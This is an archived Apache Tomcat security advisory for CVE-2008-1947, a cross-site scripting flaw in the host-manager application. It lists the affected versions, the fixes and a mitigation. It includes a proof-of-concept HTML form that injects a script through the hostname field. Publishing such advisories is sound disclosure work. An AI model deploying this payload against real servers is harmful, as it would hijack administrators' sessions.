Lucene search

K
packetstormPetr SplichalPACKETSTORM:66931
HistoryJun 03, 2008 - 12:00 a.m.

CVE-2008-1947.txt

2008-06-0300:00:00
Petr Splichal
packetstormsecurity.com
28

0.216 Low

EPSS

Percentile

95.9%

`  
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
CVE-2008-1947: Tomcat host-manager XSS vulnerability  
  
Severity: Low  
  
Vendor: The Apache Software Foundation  
  
Versions Affected:  
Tomcat 5.5.9 to 5.5.26  
Tomcat 6.0.0 to 6.0.16  
This issue has been fixed in the source repositories for each version and  
will be included in 5.5.27 and 6.0.17. It is anticipated that these  
versions will be released shortly.  
  
Description:  
The user supplied hostname attribute is not filtered before being included  
in the output.  
  
Mitigation:  
Do not visit untrusted sites whilst logged in to the host-manager  
application and log out (close the browser) once finished with the  
host-manager.  
  
Example:  
Assume that after logged in, the victim was lead to the malicious web  
server with following file installed.  
<form action="http://localhost:8080/host-manager/html/add" method="get">  
~ <INPUT TYPE="hidden" NAME='name' VALUE="<script>alert()</script>">  
~ <INPUT TYPE="hidden" NAME='aliases' VALUE="somealias">  
~ <input type="submit">  
</form>  
  
Credit:  
These issues were discovered by Petr Splichal of RedHat.  
  
References:  
http://tomcat.apache.org/security.html  
  
Mark Thomas  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.9 (MingW32)  
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org  
  
iEYEARECAAYFAkhEahEACgkQb7IeiTPGAkOQggCgirNfHSCkMDhcEzG6Ig1N0WzP  
qesAoKXePHeBKaB0VzeBoowW5kvZpBQx  
=4nQe  
-----END PGP SIGNATURE-----  
`